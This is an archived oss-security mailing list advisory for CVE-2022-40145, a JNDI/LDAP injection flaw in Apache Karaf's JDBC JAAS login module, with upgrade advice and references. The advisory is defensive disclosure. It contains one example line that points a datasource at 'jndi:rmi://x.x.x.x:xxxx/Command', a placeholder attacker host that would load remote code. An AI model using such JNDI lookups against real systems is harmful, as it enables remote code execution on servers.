Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1e60267c-edf3-05bc-4e36-78ebe5889664@apache.org>
Date: Wed, 21 Dec 2022 15:53:26 +0000
From: Jean-Baptiste Onofré <jbonofre@...che.org>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-40145: Apache Karaf: JDBC JAAS LDAP injection 

Severity: low

Description:

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

This issue is being tracked as KARAF-7568 

Credit:

Xun Bai <bbbbear68@...il.com> (reporter)

References:

https://karaf.apache.org/security/cve-2022-40145.txt
https://karaf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2022-40145
https://issues.apache.org/jira/browse/KARAF-7568

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.